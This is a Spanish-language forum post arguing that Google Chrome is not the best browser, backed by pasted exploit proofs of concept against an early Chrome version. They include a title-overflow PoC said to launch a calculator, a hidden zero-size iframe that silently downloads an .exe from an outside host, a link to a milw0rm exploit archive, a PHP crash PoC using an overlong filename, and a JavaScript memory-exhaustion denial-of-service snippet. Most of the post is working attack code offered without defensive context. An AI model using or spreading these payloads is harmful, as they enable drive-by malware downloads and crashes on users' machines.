Mejor navegador

[ne0hx]

Ja ja ja no lo creo; mira alguna de las miles de vulnerabilidades que se han conseguido en este navegador, de google, si admito que es rapidisimo, pero no el mejor.

<html>
<head>
<!--
This file is saved as "Unicode" type because Chrome convert data (payload) to
"Unicode" while handling. This PoC Code execute a calculator.

Tested on Google Chrome (Language: Vietnamese) on Windows XP SP2.
Discoverer : Le Duc Anh - SVRT - Bkis

Mail : svrt[at]bkav.com.vn
-->

<title>
瓉瓉瓉瓉瓉
瓉瓉瓉瓉瓉
瓉瓉瓉瓉
瓉瓉瓉瓉[...]AAAAAA
</title>
<body>
</body>



// ----------------------------------------------------------------

Descarga el fichero automaticamente al ordenador del usuario aunque no disponga del el consentimiento del usuario.

<script>
document.write('<iframe src="http://www.example.com/helloworld.exe" frameborder="0"
width="0" height="0">');
</script>


http://milw0rm.com/sploits/2008-chrome.tgz


//-------------------------------------------------------------------

Google Silent Crash

<?php

/*
Google Chrome 0.2.149.27 (1583) Silent Crash PoC
WHK
*/

$nombre = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
...
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd';
$contenido = 'prueba';
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$nombre");
print($contenido);

?>


//-------------------------------------------------------------------------

Una vez más el navegador desarrollado por Google, conocido como Google Chrome, presenta una vulnerabilidad facilmente explotable, esta vez se trata de Memory Exhaustation desde un servidor web remoto, provocando así una denegación de servicio.

Esta vulnerabilidad puede ser fácilmente explotada por un usuario malicioso que publique en su página web el siguiente código:


<script language=”javascript”>
window.open(”\r\n\r\n”);
window.refresh();
window.open(”\r\n\r\n”);
</script


//-------------------------------------------------------------------------

Asi podria pasar tecleando todas las vulnerabilidades que se an han conseguido, pero mejor solo dejo estas para que sepan que Google Chrome no es el mejor mavegador, en mi punto de vista no cambiaria Firefox por nada.


Saludos.